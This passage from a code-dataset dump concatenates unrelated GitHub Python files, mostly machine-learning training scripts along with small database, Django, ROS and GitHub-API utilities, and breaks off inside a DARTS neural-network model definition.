last_norm = b_norm\n # else:\n # last_norm = sum_pooling_layer(last_norm, pool_size=(2, 2))\n # last_norm = add([last_norm, b_norm])\n i += 1\n #b, b_norm = norm_layer(b)\n tf.set_random_seed(1)\n b = sk.Mex(num_classes,\n blocks=[mex_channels, 1, 1], strides=[mex_channels, 1, 1],\n softmax_mode=True, normalize_offsets=True,\n use_unshared_regions=True, shared_offset_region=[1],\n offsets_initializer='dirichlet')(b)\n b = Flatten()(b)\n model = Model(inputs=[a], outputs=[b])\n\n print(model.summary())\n\n def softmax_loss(y_true, y_pred):\n return K.categorical_crossentropy(y_pred, y_true, True)\n\n model.compile(loss=softmax_loss,\n optimizer=keras.optimizers.nadam(lr=1e-2, epsilon=1e-6),\n metrics=['accuracy'])#,\n callbacks=[TensorBoard(log_dir='log', histogram_freq=1, write_graph=True, write_images=False,\n write_grads=True)]\n\n #sk.perform_unsupervised_init(model, 'kmeans', layers=None, data=x_train, batch_size=100)\n keras.models.save_model(model, '/home/elhanani/tmp/model.hd5')\n model.fit(x_train, y_train,\n batch_size=batch_size,\n epochs=epochs,\n verbose=1,\n validation_data=(x_test, y_test),\n callbacks=callbacks)\n\n score = model.evaluate(x_test, y_test, verbose=0)\n print('Test loss:', score[0])\n print('Test accuracy:', score[1])","repo_name":"HUJI-Deep/simnets-tf","sub_path":"test/basic_net_with_keras.py","file_name":"basic_net_with_keras.py","file_ext":"py","file_size_in_byte":6476,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"21"} +{"seq_id":"22278201190","text":"import pyrootutils\nroot = pyrootutils.setup_root(\n search_from=__file__,\n indicator=[\".git\", \"pyproject.toml\"],\n pythonpath=True,\n dotenv=True,\n)\n\nfrom pathlib import Path\nimport pytorch_lightning as pl\nfrom pytorch_lightning import Trainer\nimport hydra\nfrom omegaconf import DictConfig\nimport time\nfrom modelmodule import TextClassifierModel\nfrom pytorch_lightning.callbacks import ModelCheckpoint\nfrom utils import get_pylogger, instantiate_loggers, close_loggers, log_hyperparameters\nfrom pytorch_lightning.loggers import WandbLogger\n\nlog = get_pylogger(__name__)\n\n\ndef train(cfg: DictConfig):\n t0 = time.time()\n pl.seed_everything(cfg.seed)\n\n # Load datasets\n t1 = time.time()\n dm = hydra.utils.instantiate(cfg.datamodule)\n dm.prepare_data()\n dm.setup(\"fit\")\n log.info(\"Finish load datasets in {:.2f} sec\".format(time.time() - t1))\n\n # Load model\n net = hydra.utils.instantiate(cfg.net, num_classes=dm.num_classes)\n lit_model = TextClassifierModel(net, cfg.learning_rate, num_classes=dm.num_classes)\n\n # Initialize trainer\n best_checkpoint_callback = ModelCheckpoint(\n save_top_k= cfg.trainer.max_epochs, # avoid -1 value to work with wandb logger\n monitor=\"val_acc\",\n mode=\"max\",\n dirpath=Path(cfg.paths.output_dir) / \"checkpoints\",\n filename=\"{epoch:02d}_{val_acc:.4f}\",\n save_weights_only=True,\n )\n last_checkpoint_callback = ModelCheckpoint(\n save_last=False,\n dirpath=Path(cfg.paths.output_dir) / \"checkpoints\",\n filename=\"last_{epoch:02d}_{val_acc:.4f}\",\n )\n setattr(last_checkpoint_callback, \"avail_to_wandb\", False)\n\n log.info(\"Instantiating loggers...\")\n logger = instantiate_loggers(cfg.get(\"logger\"))\n\n log.info(f\"Instantiating trainer <{cfg.trainer._target_}>\")\n trainer: Trainer = hydra.utils.instantiate(\n cfg.trainer,\n callbacks=[last_checkpoint_callback, best_checkpoint_callback],\n logger=logger,\n )\n\n object_dict = {\n \"cfg\": cfg,\n \"datamodule\": dm,\n \"model\": lit_model,\n # \"callbacks\": ,\n \"logger\": logger,\n \"trainer\": trainer,\n }\n\n if logger:\n log.info(\"Logging hyperparameters!\")\n log_hyperparameters(object_dict)\n\n if cfg.get(\"train\"):\n log.info(\"Starting training!\")\n trainer.fit(model=lit_model, datamodule=dm, ckpt_path=cfg.get(\"ckpt_path\"))\n\n # We have problems with testing in ddp settings\n # if cfg.get(\"test\"):\n # log.info(\"Starting testing!\")\n # ckpt_path = best_checkpoint_callback.best_model_path\n # if ckpt_path == \"\":\n # log.warning(\"Best ckpt not found! Using current weights for testing...\")\n # ckpt_path = None\n # trainer.test(model=lit_model, datamodule=dm, ckpt_path=ckpt_path)\n # log.info(f\"Best ckpt path: {ckpt_path}\")\n\n log.info(\n \"Finish in {:.2f} sec. out_dir={}\".format(\n time.time() - t0, cfg.paths.output_dir\n )\n )\n close_loggers()\n\n\n@hydra.main(config_path=\"configs\", config_name=\"train\", version_base=None)\ndef main(cfg):\n train(cfg)\n\n\nif __name__ == \"__main__\":\n from pyrootutils import setup_root\n\n root = setup_root(\n __file__, indicator=[\".git\"], dotenv=True, pythonpath=True, cwd=False\n )\n main()\n","repo_name":"NNHieu/Influence-Functions","sub_path":"sequence_problems/train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":3319,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"43232935355","text":"import tensorflow as tf\nfrom tensorflow.keras.datasets import mnist\nfrom tensorflow import keras\nfrom tensorflow.keras import layers\nimport numpy as np\nimport matplotlib.pyplot as plt\n\nprint(f\"Tensorflow module locaiton: {tf.__file__}\")\nprint(f\"TensowFlow version: {tf.__version__}\")\n#tf.config.set_visible_devices([], 'GPU')\n\nnum_epochs = 5\nbatch_size = 128\nlayer_sizes = [8, 16, 32, 64, 128, 256, 512, 1024]\n\n(train_images, train_labels), (test_images, test_labels) = mnist.load_data()\n\n# Reshape the data into a 28*28 = 784 vector\ntrain_images = train_images.reshape((60000, 28*28))\ntest_images = test_images.reshape((10000, 28*28))\n\n# The image data ranges from 0 - 255 integers, so this\n# reformats it to floating point values between 0.0 and 1.0\ntrain_images = train_images.astype(\"float32\") / 255\ntest_images = test_images.astype(\"float32\") / 255\n\n# Do some hyperparameter tuning of layer size\nlayer_size_vs_accuracy = {}\nfor layer_size in layer_sizes:\n\tprint(f\"Fitting model with layer size: {layer_size}\")\n\t# Create a sequential model with one hidden layer of 512 neurons\n\t# and one output layer of 10 digits for classifying digits 0 - 9\n\tmodel = keras.Sequential([\n\t\tlayers.Dense(layer_size, activation=\"relu\"),\n\t\tlayers.Dense(10, activation=\"softmax\")\n\t])\n\n\t# Compile the model tracking accuracy\n\tmodel.compile(\n\t\toptimizer=keras.optimizers.RMSprop(1e-2),\n\t\tloss=\"sparse_categorical_crossentropy\",\n\t\tmetrics=[\"accuracy\"]\n\t)\n\n\t# Effect of batch size\n\t# small batch size --> very slow, averaging and applying weights for each sample, each epoch, good result\n\t# batch_size == sample_size (train_images.shape[0]) --> very fast, averaging and applying weights only once per epoch, poor result\n\t# moderate batch size, such as 128 --> quick and approaches answer quickly, nice happy medium, good result\n\thistory = model.fit(\n\t\ttrain_images,\n\t\ttrain_labels,\n\t\tepochs=num_epochs,\n\t\tbatch_size=batch_size,\n\t\tvalidation_split=0.2\n\t)\n\tlayer_size_vs_accuracy[layer_size] = history.history\n\n# Summarize the results of the experiment\nfig = plt.figure()\nplt.title(\"Hidden layer size vs. model accuracy\")\nx = layer_sizes\ny = []\nfor layer_size in layer_size_vs_accuracy:\n\ty.append(layer_size_vs_accuracy[layer_size]['accuracy'][-1])\n\naccuracy_vs_layer_size_plot = plt.plot(x, y, color='red', marker='o')\nplt.show()\n","repo_name":"nathankrueger/tensorflow_examples","sub_path":"examples/mnist_perceptron.py","file_name":"mnist_perceptron.py","file_ext":"py","file_size_in_byte":2364,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"19592905825","text":"from fastapi_users.db import SQLAlchemyBaseUserTable\nfrom sqlalchemy import Column, Integer, String, Table, ForeignKey, Numeric, UniqueConstraint\nfrom sqlalchemy.orm import relationship\n\nfrom src.database import Base\n\n\nusers_plats = Table(\n \"user_plant\",\n Base.metadata,\n Column(\"id\", Integer, primary_key=True),\n Column(\"user_id\", ForeignKey(\"user.id\")),\n Column(\"plant_id\", ForeignKey(\"plant.id\")),\n Column(\"amount\", Integer),\n UniqueConstraint('user_id', 'plant_id'),\n)\n\n\nclass User(SQLAlchemyBaseUserTable[int], Base):\n id = Column(Integer, primary_key=True)\n name = Column(String)\n wallet = Column(Numeric(precision=10, scale=2))\n\n plants = relationship(\"Plant\", secondary=users_plats, backref=\"users\")\n","repo_name":"davidkrivko/Garden","sub_path":"src/auth/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":741,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"32521368716","text":"import pandas as pd\nfrom sqlalchemy import *\nimport hashlib\nimport numpy\nfrom psycopg2.extensions import register_adapter, AsIs\ndef adapt_numpy_int64(numpy_int64):\n return AsIs(numpy_int64)\n\nregister_adapter(numpy.int64, adapt_numpy_int64)\n\n\nengine = create_engine('postgresql://test_user:testtest@localhost/redcarpet')\nconnection = engine.connect()\nmeta = MetaData(bind=engine)\nm = hashlib.md5()\nzeta_wallet = Table('zeta_wallet', meta,\n Column('wallet_id', INTEGER, Sequence('wallet_id_seq'), primary_key=True),\n Column('DDate', TEXT, nullable=True),\n Column('From_to_party', TEXT, nullable=True),\n Column('Credit', FLOAT, nullable=True),\n Column('Debit', FLOAT, nullable=True),\n Column('Balance', FLOAT, nullable=True),\n Column('Bank_ref_txn_id', TEXT, nullable=True),\n Column('Load', FLOAT, nullable=True),\n Column('Key', TEXT, nullable=True),\n Column('Lender', TEXT, nullable=True),\n Column('Zeta_Order_Id', TEXT, nullable=True),\n Column('DMI_User_bal', FLOAT, nullable=True),\n Column('RC_User_bal', FLOAT, nullable=True),\n Column('DMI_usr_bal_post_may', FLOAT, nullable=True),\n Column('Chandan_comment', TEXT, nullable=True),\n Column('Current_date', TEXT, nullable=True),\n Column('Status', TEXT, nullable=True),\n Column('Unnamed_col1', FLOAT, nullable=True),\n Column('Unnamed_col2', FLOAT, nullable=True),\n Column('Unnamed_col3', FLOAT, nullable=True),\n Column('Unnamed_col4', FLOAT, nullable=True),\n Column('Unnamed_col5', FLOAT, nullable=True),\n Column('Unnamed_col6', FLOAT, nullable=True),\n Column('Unnamed_col7', FLOAT, nullable=True),\n Column('Unnamed_col8', FLOAT, nullable=True),\n Column('Unnamed_col9', FLOAT, nullable=True),\n Column('Actual_bal', FLOAT, nullable=True),\n Column('Data_status',TEXT, nullable=True),\n Column('data_hash', TEXT, nullable=False))\n\nengine = create_engine('postgresql://test_user:testtest@localhost/redcarpet')\nconnection = engine.connect()\n\ndf1 = pd.read_csv('/home/saxena/PycharmProjects/test1/Tests/Zeta_Wallet_Loads_Zeta_Loads_mod.csv')\n\nif engine.has_table('zeta_wallet') is False:\n zeta_wallet.create()\n ins = zeta_wallet.insert()\n for tup in df1.itertuples():\n hash_obj = ''\n for i in range(1, len(df1.columns)+1):\n\n hash_obj += str(tup[i])\n hash_code = hashlib.md5(hash_obj.encode()).hexdigest()\n engine.execute(zeta_wallet.insert(), DDate=tup[1], From_to_party=tup[2], Credit=tup[3], Debit=tup[4],\n Balance=tup[5], Bank_ref_txn_id=tup[6], Load=tup[7], Key=tup[8], Lender=tup[9],\n Zeta_Order_Id=tup[10], DMI_User_bal=tup[11], RC_User_bal=tup[12], DMI_usr_bal_post_may=tup[13],\n Chandan_comment=tup[14], Current_date=tup[15], Status=tup[16], Unnamed_col1=tup[17],\n Unnamed_col2=tup[18], Unnamed_col3=tup[19], Unnamed_col4=tup[20], Unnamed_col5=tup[21],\n Unnamed_col6=tup[22], Unnamed_col7=tup[23], Unnamed_col8=tup[24], Unnamed_col9=tup[25],\n Actual_bal=tup[26], Data_status='NEW', data_hash=hash_code)\n\ndf2 = pd.read_sql_table('zeta_wallet', engine)\n\nhash_df1 = []\nfor tup in df1.itertuples():\n hash_obj = ''\n for i in range(1, len(df1.columns) + 1):\n hash_obj += str(tup[i])\n hash_code = hashlib.md5(hash_obj.encode()).hexdigest()\n hash_df1.append(hash_code)\n\ndf2_hash = pd.DataFrame(df2['data_hash'].copy())\ndf1_hash = pd.DataFrame(hash_df1)\nfor j, row in enumerate(df2_hash.itertuples()):\n for k, cow in enumerate(df1_hash.itertuples()):\n flag = 0\n if row[1] == cow[1]:\n df2.set_value(j, 'Data_status', 'DELETED')\n break\n\nval = df2.loc[df2['Data_status'] == 'DELETED', 'wallet_id'].values\n#tmp = df2.loc[df2['Data_status'] == 'NEW', 'wallet_id'].values\nstmt = zeta_wallet.update().where(zeta_wallet.c.wallet_id == bindparam('wlt_id')).values(Data_status='DELETED')\nst = []\nfor i in val:\n st.append({'wlt_id': i})\nconnection.execute(stmt, st)\nins = zeta_wallet.insert()\nfor tup in df1.itertuples():\n hash_obj = ''\n for i in range(1, len(df1.columns) + 1):\n hash_obj += str(tup[i])\n hash_code = hashlib.md5(hash_obj.encode()).hexdigest()\n engine.execute(zeta_wallet.insert(), DDate=tup[1], From_to_party=tup[2], Credit=tup[3], Debit=tup[4],\n Balance=tup[5], Bank_ref_txn_id=tup[6], Load=tup[7], Key=tup[8], Lender=tup[9],\n Zeta_Order_Id=tup[10], DMI_User_bal=tup[11], RC_User_bal=tup[12], DMI_usr_bal_post_may=tup[13],\n Chandan_comment=tup[14], Current_date=tup[15], Status=tup[16], Unnamed_col1=tup[17],\n Unnamed_col2=tup[18], Unnamed_col3=tup[19], Unnamed_col4=tup[20], Unnamed_col5=tup[21],\n Unnamed_col6=tup[22], Unnamed_col7=tup[23], Unnamed_col8=tup[24], Unnamed_col9=tup[25],\n Actual_bal=tup[26], Data_status='NEW', data_hash=hash_code)\n\nconnection.close()","repo_name":"pulkitsaxena14/rc_test","sub_path":"hash_compare.py","file_name":"hash_compare.py","file_ext":"py","file_size_in_byte":5436,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"3785188255","text":"from django import forms\n\nfrom pages.models import Produto, DoacaoAgendada\n\nclass AgendamentoForm(forms.ModelForm):\n\n class Meta:\n model = DoacaoAgendada\n fields = ('produto', 'quantidade', )\n\n\n def __init__(self, *args, **kwargs):\n\n super(AgendamentoForm, self).__init__(*args, **kwargs)\n \n self.fields['quantidade'].widget.attrs['readonly'] = 'readonly'\n \n initial = kwargs.get('initial')\n grupoProduto = initial.get('grupoProduto')\n \n self.fields['produto'].queryset = Produto.objects.filter(\n grupoProduto=grupoProduto,\n aceitaDoacao=True\n )\n","repo_name":"celsorv/cesta","sub_path":"doacao/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":651,"program_lang":"python","lang":"pt","doc_type":"code","stars":3,"dataset":"github-code","pt":"21"} +{"seq_id":"19504504937","text":"#!/usr/bin/env python2\n# -*- coding: utf-8 -*-\n# license removed for brevity\nimport rospy, signal, sys, readchar\nimport tty, termios, select\nfrom std_msgs.msg import String\n\nlastchoice = ''\n\ndef sigint_callback():\n rospy.signal_shutdown(\"Ctrl+C detected\")\n sys.exit(0)\n\n\ndef controller():\n global lastchoice\n\n choice = readchar.readkey()\n\n # SIGINT handler\n if choice == '\\x03':\n sigint_callback()\n\n if choice in \"CANEenac\":\n choice = choice.lower()\n if choice != lastchoice:\n rospy.loginfo(\"HAI SELEZIONATO %s\" % choice)\n lastchoice = choice\n\n pub.publish(choice)\n\n\nif __name__ == '__main__':\n pub = rospy.Publisher('controller', String, queue_size=10)\n rospy.init_node('controller', anonymous=True)\n\n string = \"\"\"\\n\\r\nDigita la tua scelta:\\n\\r\n- 'a': stampa tutti i dati\n- 'n': stampa il nome dello studente\n- 'e': stampa l'età dello studente\n- 'c': stampa il corso di laurea dello studente\\n\\r\nCtrl+C per terminare\n \"\"\"\n\n rospy.loginfo(string)\n\n while True:\n controller()\n","repo_name":"BAnd313/homework1","sub_path":"src/controller.py","file_name":"controller.py","file_ext":"py","file_size_in_byte":1072,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"27147193151","text":"# coding: utf-8\n\"\"\"\nCenters of mass of water molecule\n\"\"\"\n\nimport numpy as np\nfrom logging import getLogger\nfrom genice2.decorators import timeit, banner\nimport genice2.formats\n\n\nclass Format(genice2.formats.Format):\n \"\"\"\nCenters-of-mass of water molecules are output in @AR3A format.\nNo options available.\n \"\"\"\n\n def __init__(self, **kwargs):\n super().__init__(**kwargs)\n\n def hooks(self):\n return {1: self.Hook1}\n\n @timeit\n @banner\n def Hook1(self, ice):\n \"Output centers of mass of water molecules.\"\n logger = getLogger()\n cellmat = ice.repcell.mat\n s = \"\"\n if cellmat[1, 0] == 0 and cellmat[2, 0] == 0 and cellmat[2, 1] == 0:\n s += \"@BOX3\\n\"\n s += \"{0} {1} {2}\\n\".format(cellmat[0, 0] *\n 10, cellmat[1, 1] * 10, cellmat[2, 2] * 10)\n else:\n s += \"@BOX9\\n\"\n for d in range(3):\n s += \"{0} {1} {2}\\n\".format(cellmat[0, d] *\n 10, cellmat[1, d] * 10, cellmat[2, d] * 10)\n s += \"@AR3A\\n\"\n s += \"{0}\\n\".format(len(ice.reppositions))\n for pos in ice.reppositions:\n position = pos @ cellmat * 10 # in Angstrom\n s += \"{0:9.4f} {1:9.4f} {2:9.4f}\\n\".format(position[0],\n position[1],\n position[2])\n s = \"\\n\".join(ice.doc) + \"\\n\" + s\n self.output = s\n","repo_name":"vitroid/GenIce","sub_path":"genice2/formats/com.py","file_name":"com.py","file_ext":"py","file_size_in_byte":1525,"program_lang":"python","lang":"en","doc_type":"code","stars":51,"dataset":"github-code","pt":"37"} +{"seq_id":"31947783285","text":"# Python\nimport os\n\n# Database\nfrom database import SessionLocal\nfrom database.queries import get_row, write_row\n\n\ndef check_root(root_user: dict):\n db = SessionLocal()\n root = get_row(db, \"Trader\", username=root_user[\"username\"])\n if root is None:\n root = write_row(db, \"Trader\", with_dict=root_user)\n print(f\"Superuser created: {root.username}\")\n print(\"Welcome to OTI\")\n db.close()\n\n\ndef create_directories(directories: list):\n for dir in directories:\n os.makedirs(dir, exist_ok=True)\n","repo_name":"josdanind/OTI-Algorithmic-Trading","sub_path":"services/api/utils/starting_server.py","file_name":"starting_server.py","file_ext":"py","file_size_in_byte":527,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"15260537757","text":"import json\r\nimport requests\r\n\r\n# Authentication info\r\n\r\nwith open('./input/authParams.txt') as f:\r\n USERNAME, TOKEN = f.read().splitlines()\r\n\r\n# The repository to add this issue to\r\n\r\nwith open('./input/prParams.txt') as f:\r\n REPO_NAME, REPO_OWNER, PR_NUMBER = f.read().splitlines()\r\n PR_NUMBER = int(PR_NUMBER, 10)\r\n\r\ndef make_github_comment(body=None):\r\n '''Create a comment on github.com using the given parameters.'''\r\n # Our url to create comments via POST\r\n url = 'https://api.github.com/repos/%s/%s/issues/%i/comments' % (REPO_OWNER, REPO_NAME, PR_NUMBER)\r\n # Create an authenticated session to create the comment\r\n headers = {\r\n \"Authorization\": \"token %s\" % TOKEN,\r\n }\r\n # Create our comment\r\n data = {'body': body}\r\n\r\n r = requests.post(url, json.dumps(data), headers=headers)\r\n if r.status_code == 201:\r\n print('Successfully created comment \"%s\"' % body)\r\n else:\r\n print('Could not create comment \"%s\"' % body)\r\n print('Response:', r.content)\r\n\r\nmake_github_comment(\"\"\"__Hi there! This pull request looks like it might be a duplicate of #2.__\r\n\r\nPlease help us out by clicking one of the options below:\r\n- This comment was [__useful__](https://pages.github.com/).\r\n- This pull request is __not a duplicate__, so this comment was [__not useful__](https://pages.github.com/).\r\n- I do not need this service, so this comment was [__not useful__](https://pages.github.com/).\r\n \"\"\")\r\n","repo_name":"dupbot/test-repo","sub_path":"PRcommenter.py","file_name":"PRcommenter.py","file_ext":"py","file_size_in_byte":1479,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"74535883627","text":"import string\r\nchar_list = []\r\ncount_char = 0\r\ncount_char_for_first = 0\r\ncount_char_for_sec = 0\r\ncount_char_for_th = 0\r\nchar_num = int(input(\"enter char numbers: \"))\r\nif(char_num >= 1 and char_num <= 4):\r\n for i in range(0, char_num):\r\n char = input(\"enter char: \")\r\n char_list.append(char)\r\n\r\n print(char_list)\r\n \r\n for i in char_list:\r\n if(type(i) is str == True):\r\n if(check_num == 1):\r\n if(i in string.ascii_lowercase):\r\n sen = \"This sentence contains \"+i+\"'s\"\r\n print(sen)\r\n for j in sen:\r\n if(i == j):\r\n count_char += 1\r\n print(i+\":\"+count_char)\r\n new_sen = \"This sentence contains \"+count_char+\" \"+i+\"'s\"\r\n print(new_sen)\r\n elif(check_num == 2):\r\n if(i in string.ascii_lowercase):\r\n sen2 = \"This sentence contains \"+i+\"'s and \"+char_list[index(i)+1]+\"'s\"\r\n print(sen2)\r\n for j in sen2:\r\n if(i == j):\r\n count_char_for_first += 1\r\n elif(char_list[index(i)+1] == j):\r\n count_char_for_sec += 1\r\n print(count_char_for_first)\r\n print(count_char_for_sec)\r\n new_sen1 = \"This sentence contains \"+count_char_for_first+\" \"+i+\"'s and \"+count_char_for_sec+\" \"+char_list[index(i)+1]+\"'s\"\r\n print(new_sen1)\r\n elif(check_num == 3):\r\n if(i in string.ascii_lowercase):\r\n sen3 = \"This sentence contains \"+i+\"'s and \"+char_list[index(i)+1]+\"'s and \"+char_list[index(i)+2]+\"'s\"\r\n print(sen3)\r\n for j in sen3:\r\n if(i == j):\r\n count_char_for_first += 1\r\n elif(char_list[index(i)+1] == j):\r\n count_char_for_sec += 1\r\n elif(char_list[index(i)+2] == j):\r\n count_char_for_th += 1\r\n print(count_char_for_first)\r\n print(count_char_for_sec)\r\n print(count_char_for_th)\r\n new_sen2 = \"This sentence contains \"+count_char_for_first+\" \"+i+\"'s and \"+count_char_for_sec+\" \"+char_list[index(i)+1]+\"'s and \"+count_char_for_th+\" \"+char_list[index(i)+2]+\"'s\"\r\n print(new_sen2)\r\n '''if(check_num == 1):\r\n sen = \"This sentence contains two\"+i+\"'s.\"\r\n if(i in sen == True):\r\n count_char = count_char + 1\r\n print(count_char)\r\n elif(check_num == 2):\r\n sen = \"This sentence contains three\"+i+\"'s and three \"+char_list[index(i)+1]+\"'s OR This sentence contains three a's and two r's.\"\r\n if(i in sen == True and char_list[index(i)+1] in sen == True):\r\n count_char = count_char + 1\r\n count_char = count_char + 1\r\n print(count_char)\r\n print(count_char2)\r\n elif(check_num == 3):\r\n sen = \"This sentence contains one\"+i+\", one \"+char_list[index(i)+1]+\" and one \"+char_list[index(i)+2]+\".\"\r\n if(i in sen == True and char_list[index(i)+1] in sen == True and char_list[index(i)+2] in sen == True):\r\n count_char = count_char + 1\r\n count_char2 = count_char2 + 1\r\n count_char3 = count_char3 + 1\r\n print(count_char)\r\n print(count_char2)\r\n print(count_char3)'''\r\nelse:\r\n print(\"enter valid number\")\r\n","repo_name":"hmake98/codevita-round1-2018-C","sub_path":"Syntax.py","file_name":"Syntax.py","file_ext":"py","file_size_in_byte":4057,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"24649439287","text":"import numpy as np\nimport matplotlib.pyplot as plt\n\ndef Task_7():\n arr = np.array(np.random.randint(0,2,(10,10)))\n fig, axs = plt.subplots(2,2, figsize=(10,10))\n\n axs[0, 0].imshow(arr)\n axs[0, 0].set_title('Исходное изображение')\n\n newArr = np.array(arr[3:7, 3:7])\n axs[0, 1].imshow(newArr)\n axs[0, 1].set_title('Центр. часть (4х4)')\n\n invArr = np.array(1 - arr)\n axs[1, 0].imshow(invArr)\n axs[1, 0].set_title('Инвертированное изображение')\n\n Arr1 = []\n for i in range(len(arr)):\n Arr2 = []\n for j in range(len(arr[i])-1):\n if(j == 0):\n continue\n elif(j == len(arr[i])):\n break\n else:\n Arr2.append((arr[i,j-1]+arr[i,j]+arr[i,j+1])/3)\n Arr1.append(Arr2)\n\n blurryArr = np.array(Arr1)\n axs[1,1].imshow(blurryArr)\n axs[1, 1].set_title('Размытое изображение')\n plt.show()\n fig.savefig('images_matplotlib.png')","repo_name":"Meggi9/Learn_NumPy_Matplotlib","sub_path":"Task_7.py","file_name":"Task_7.py","file_ext":"py","file_size_in_byte":1029,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"18676113986","text":"\"\"\"\n DARTS for ImageNet-1K, implemented in Gluon.\n Original paper: 'DARTS: Differentiable Architecture Search,' https://arxiv.org/abs/1806.09055.\n\"\"\"\n\n__all__ = ['DARTS', 'darts']\n\nimport os\nfrom mxnet import cpu\nfrom mxnet.gluon import nn, HybridBlock\nfrom mxnet.gluon.contrib.nn import Identity\nfrom .common import conv1x1\nfrom .nasnet import nasnet_dual_path_sequential\n\n\nclass DwsConv(HybridBlock):\n \"\"\"\n Standard dilated depthwise separable convolution block with.\n\n Parameters:\n ----------\n in_channels : int\n Number of input channels.\n out_channels : int\n Number of output channels.\n kernel_size : int or tuple/list of 2 int\n Convolution window size.\n strides : int or tuple/list of 2 int\n Strides of the convolution.\n padding : int or tuple/list of 2 int\n Padding value for convolution layer.\n dilation : int or tuple/list of 2 int\n Dilation value for convolution layer.\n use_bias : bool, default False\n Whether the layers use a bias vector.\n \"\"\"\n def __init__(self,\n in_channels,\n out_channels,\n kernel_size,\n strides,\n padding,\n dilation,\n use_bias=False,\n **kwargs):\n super(DwsConv, self).__init__(**kwargs)\n with self.name_scope():\n self.dw_conv = nn.Conv2D(\n channels=in_channels,\n kernel_size=kernel_size,\n strides=strides,\n padding=padding,\n dilation=dilation,\n groups=in_channels,\n use_bias=use_bias,\n in_channels=in_channels)\n self.pw_conv = conv1x1(\n in_channels=in_channels,\n out_channels=out_channels,\n use_bias=use_bias)\n\n def hybrid_forward(self, F, x):\n x = self.dw_conv(x)\n x = self.pw_conv(x)\n return x\n\n\nclass DartsConv(HybridBlock):\n \"\"\"\n DARTS specific convolution block.\n\n Parameters:\n ----------\n in_channels : int\n Number of input channels.\n out_channels : int\n Number of output channels.\n kernel_size : int or tuple/list of 2 int\n Convolution window size.\n strides : int or tuple/list of 2 int\n Strides of the convolution.\n padding : int or tuple/list of 2 int\n Padding value for convolution layer.\n activate : bool, default True\n Whether activate the convolution block.\n \"\"\"\n def __init__(self,\n in_channels,\n out_channels,\n kernel_size,\n strides,\n padding,\n activate=True,\n **kwargs):\n super(DartsConv, self).__init__(**kwargs)\n self.activate = activate\n\n with self.name_scope():\n if self.activate:\n self.activ = nn.Activation(\"relu\")\n self.conv = nn.Conv2D(\n channels=out_channels,\n kernel_size=kernel_size,\n strides=strides,\n padding=padding,\n use_bias=False,\n in_channels=in_channels)\n self.bn = nn.BatchNorm(in_channels=out_channels)\n\n def hybrid_forward(self, F, x):\n if self.activate:\n x = self.activ(x)\n x = self.conv(x)\n x = self.bn(x)\n return x\n\n\ndef darts_conv1x1(in_channels,\n out_channels,\n activate=True):\n \"\"\"\n 1x1 version of the DARTS specific convolution block.\n\n Parameters:\n ----------\n in_channels : int\n Number of input channels.\n out_channels : int\n Number of output channels.\n activate : bool, default True\n Whether activate the convolution block.\n \"\"\"\n return DartsConv(\n in_channels=in_channels,\n out_channels=out_channels,\n kernel_size=1,\n strides=1,\n padding=0,\n activate=activate)\n\n\ndef darts_conv3x3_s2(in_channels,\n out_channels,\n activate=True):\n \"\"\"\n 3x3 version of the DARTS specific convolution block with stride 2.\n\n Parameters:\n ----------\n in_channels : int\n Number of input channels.\n out_channels : int\n Number of output channels.\n activate : bool, default True\n Whether activate the convolution block.\n \"\"\"\n return DartsConv(\n in_channels=in_channels,\n out_channels=out_channels,\n kernel_size=3,\n strides=2,\n padding=1,\n activate=activate)\n\n\nclass DartsDwsConv(HybridBlock):\n \"\"\"\n DARTS specific dilated convolution block.\n\n Parameters:\n ----------\n in_channels : int\n Number of input channels.\n out_channels : int\n Number of output channels.\n kernel_size : int or tuple/list of 2 int\n Convolution window size.\n strides : int or tuple/list of 2 int\n Strides of the convolution.\n padding : int or tuple/list of 2 int\n Padding value for convolution layer.\n dilation : int or tuple/list of 2 int\n Dilation value for convolution layer.\n \"\"\"\n def __init__(self,\n in_channels,\n out_channels,\n kernel_size,\n strides,\n padding,\n dilation,\n **kwargs):\n super(DartsDwsConv, self).__init__(**kwargs)\n with self.name_scope():\n self.activ = nn.Activation(\"relu\")\n self.conv = DwsConv(\n in_channels=in_channels,\n out_channels=out_channels,\n kernel_size=kernel_size,\n strides=strides,\n padding=padding,\n dilation=dilation,\n use_bias=False)\n self.bn = nn.BatchNorm(in_channels=out_channels)\n\n def hybrid_forward(self, F, x):\n x = self.activ(x)\n x = self.conv(x)\n x = self.bn(x)\n return x\n\n\nclass DartsDwsBranch(HybridBlock):\n \"\"\"\n DARTS specific block with depthwise separable convolution layers.\n\n Parameters:\n ----------\n in_channels : int\n Number of input channels.\n out_channels : int\n Number of output channels.\n kernel_size : int or tuple/list of 2 int\n Convolution window size.\n strides : int or tuple/list of 2 int\n Strides of the convolution.\n padding : int or tuple/list of 2 int\n Padding value for convolution layer.\n \"\"\"\n def __init__(self,\n in_channels,\n out_channels,\n kernel_size,\n strides,\n padding,\n **kwargs):\n super(DartsDwsBranch, self).__init__(**kwargs)\n mid_channels = in_channels\n\n with self.name_scope():\n self.conv1 = DartsDwsConv(\n in_channels=in_channels,\n out_channels=mid_channels,\n kernel_size=kernel_size,\n strides=strides,\n padding=padding,\n dilation=1)\n self.conv2 = DartsDwsConv(\n in_channels=mid_channels,\n out_channels=out_channels,\n kernel_size=kernel_size,\n strides=1,\n padding=padding,\n dilation=1)\n\n def hybrid_forward(self, F, x):\n x = self.conv1(x)\n x = self.conv2(x)\n return x\n\n\nclass 